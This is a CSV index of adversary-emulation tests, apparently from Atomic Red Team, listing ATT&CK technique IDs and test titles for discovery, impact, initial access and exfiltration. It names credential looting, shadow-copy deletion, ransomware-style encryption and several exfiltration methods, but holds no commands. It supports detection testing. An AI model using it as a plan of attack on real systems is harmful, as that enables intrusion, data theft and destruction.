discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
discovery,T1057,Process Discovery,7,Process Discovery - Process Hacker,966f4c16-1925-4d9b-8ce0-01334ee0867d,powershell
discovery,T1057,Process Discovery,8,Process Discovery - PC Hunter,b4ca838d-d013-4461-bf2c-f7132617b409,powershell
discovery,T1057,Process Discovery,9,Launch Taskmgr from cmd to View running processes,4fd35378-39aa-481e-b7c4-e3bf49375c67,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,7,Permission Groups Discovery for Containers- Local Groups,007d7aa4-8c4d-4f55-ba6a-7c965d51219c,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - FreeBSD,a7893624-a3d7-4aed-9676-80498f31820f,sh
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,4,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,5,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1201,Password Policy Discovery,6,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,7,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,8,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1201,Password Policy Discovery,9,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,10,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1201,Password Policy Discovery,11,Use of SecEdit.exe to export the local security policy (including the password policy),510cc97f-56ac-4cd3-a198-d3218c23d889,command_prompt
discovery,T1201,Password Policy Discovery,12,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,7,Discover System Language with dism.exe,69f625ba-938f-4900-bdff-82ada3df5d9c,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,8,Discover System Language by Windows API Query,e39b99e9-ce7f-4b24-9c88-0fbad069e6c6,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,9,Discover System Language with WMIC,4758003d-db14-4959-9c0f-9e87558ac69e,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,10,Discover System Language with Powershell,1f23bfe8-36d4-49ce-903a-19a1e8c6631b,powershell
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
discovery,T1012,Query Registry,4,Reg query for AlwaysInstallElevated status,6fb4c4c5-f949-4fd2-8af5-ddbc61595223,command_prompt
discovery,T1012,Query Registry,5,Check Software Inventory Logging (SIL) status via Registry,5c784969-1d43-4ac7-8c3d-ed6d025ed10d,command_prompt
discovery,T1012,Query Registry,6,Inspect SystemStartOptions Value in Registry,96257079-cdc1-4aba-8705-3146e94b6dce,command_prompt
discovery,T1614,System Location Discovery,1,Get geolocation info through IP-Lookup services using curl Windows,fe53e878-10a3-477b-963e-4367348f5af5,command_prompt
discovery,T1614,System Location Discovery,2,"Get geolocation info through IP-Lookup services using curl freebsd, linux or macos",552b4db3-8850-412c-abce-ab5cc8a86604,bash
discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - pgrep (FreeBSD),fa96c21c-5fd6-4428-aa28-51a2fbecdbdc,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,7,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,8,Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets,015cd268-996e-4c32-8347-94c80c6286ee,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,9,Security Software Discovery - Windows Defender Enumeration,d3415a0e-66ef-429b-acf4-a768876954f6,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,10,Security Software Discovery - Windows Firewall Enumeration,9dca5a1d-f78c-4a8d-accb-d6de67cfed6b,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,11,Get Windows Defender exclusion settings using WMIC,e31564c8-4c60-40cd-a8f4-9261307e8336,command_prompt
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
discovery,T1526,Cloud Service Discovery,2,AWS - Enumerate common cloud services,aa8b9bcc-46fa-4a59-9237-73c7b93a980c,powershell
discovery,T1526,Cloud Service Discovery,3,Azure - Enumerate common cloud services,58f57c8f-db14-4e62-a4d3-5aaf556755d7,powershell
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d2791d72-b67f-4615-814f-ec824a91f514,sh
discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1018,Remote System Discovery,16,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,18,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,19,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,20,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,21,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1018,Remote System Discovery,22,Enumerate Remote Hosts with Netscan,b8147c9a-84db-4ec1-8eee-4e0da75f0de5,powershell
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
discovery,T1046,Network Service Discovery,10,Port-Scanning /24 Subnet with PowerShell,05df2a79-dba6-4088-a804-9ca0802ca8e4,powershell
discovery,T1046,Network Service Discovery,11,Remote Desktop Services Discovery via PowerShell,9e55750e-4cbf-4013-9627-e9a045b541bf,powershell
discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1622,Debugger Evasion,1,Detect a Debugger Presence in the Machine,58bd8c8d-3a1a-4467-a69c-439c75469b07,powershell
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
discovery,T1124,System Time Discovery,6,Discover System Time Zone via Registry,25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47,command_prompt
reconnaissance,T1592.001,Gather Victim Host Information: Hardware,1,Enumerate PlugNPlay Camera,d430bf85-b656-40e7-b238-42db01df0183,powershell
reconnaissance,T1595.003,Active Scanning: Wordlist Scanning,1,Web Server Wordlist Scan,89a83c3e-0b39-4c80-99f5-c2aa084098bd,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-427f-aa08-2a65fa29a820,sh
impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
impact,T1491.001,Defacement: Internal Defacement,4,Windows - Display a simulated ransom note via Notepad (non-destructive),0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1531,Account Access Removal,5,Delete User via dscl utility,4d938c43-2fe8-4d70-a5b3-5bf239aa7846,sh
impact,T1531,Account Access Removal,6,Delete User via sysadminctl utility,d3812c4e-30ee-466a-a0aa-07e355b561d6,sh
impact,T1531,Account Access Removal,7,Azure AD - Delete user via Azure AD PowerShell,4f577511-dc1c-4045-bcb8-75d2457f01f4,powershell
impact,T1531,Account Access Removal,8,Azure AD - Delete user via Azure CLI,c955c1c7-3145-4a22-af2d-63eea0d967f0,powershell
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (FreeBSD/Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,sh
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (FreeBSD/Linux),142752dc-ca71-443b-9359-cf6f497315f1,sh
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1486,Data Encrypted for Impact,6,Encrypt files using 7z utility - macOS,645f0f5a-ef09-48d8-b9bc-f0e24c642d72,sh
impact,T1486,Data Encrypted for Impact,7,Encrypt files using openssl utility - macOS,1a01f6b8-b1e8-418e-bbe3-78a6f822759e,sh
impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
impact,T1496,Resource Hijacking,1,FreeBSD/macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,sh
impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
impact,T1485,Data Destruction,5,ESXi - Delete VM Snapshots,1207ddff-f25b-41b3-aa0e-7c26d2b546d1,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
impact,T1490,Inhibit System Recovery,12,Disable Time Machine,ed952f70-91d4-445a-b7ff-30966bfb1aff,sh
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - FreeBSD/Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,sh
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - FreeBSD,7b1cee42-320f-4890-b056-d65c8b884ba5,sh
impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh
impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
impact,T1529,System Shutdown/Reboot,13,ESXi - Terminates VMs using pkill,987c9b4d-a637-42db-b1cb-e9e242c3991b,command_prompt
impact,T1529,System Shutdown/Reboot,14,ESXi - Avoslocker enumerates VMs and forcefully kills VMs,189f7d6e-9442-4160-9bc3-5e4104d93ece,command_prompt
impact,T1529,System Shutdown/Reboot,15,ESXi - vim-cmd Used to Power Off VMs,622cc1a0-45e7-428c-aed7-c96dd605fbe6,command_prompt
impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.002,Phishing: Spearphishing Link,1,Paste and run technique,bc177ef9-6a12-4ebc-a2ec-d41e19c2791d,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,13,Use PsExec to elevate to NT Authority\SYSTEM account,6904235f-0f55-4039-8aed-41c300ff7733,command_prompt
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1020,Automated Exfiltration,2,Exfiltration via Encrypted FTP,5b380e96-b0ef-4072-8a8e-f194cb9eb9ac,powershell
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,3,Exfiltrate data in a file over HTTPS using wget,7ccdfcfa-6707-46bc-b812-007ab6ff951c,sh
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,4,Exfiltrate data as text over HTTPS using wget,8bec51da-7a6d-4346-b941-51eca448c4b0,sh
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration using DNS subdomains,c9207f3e-213d-4cc7-ad2a-7697a7237df9,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
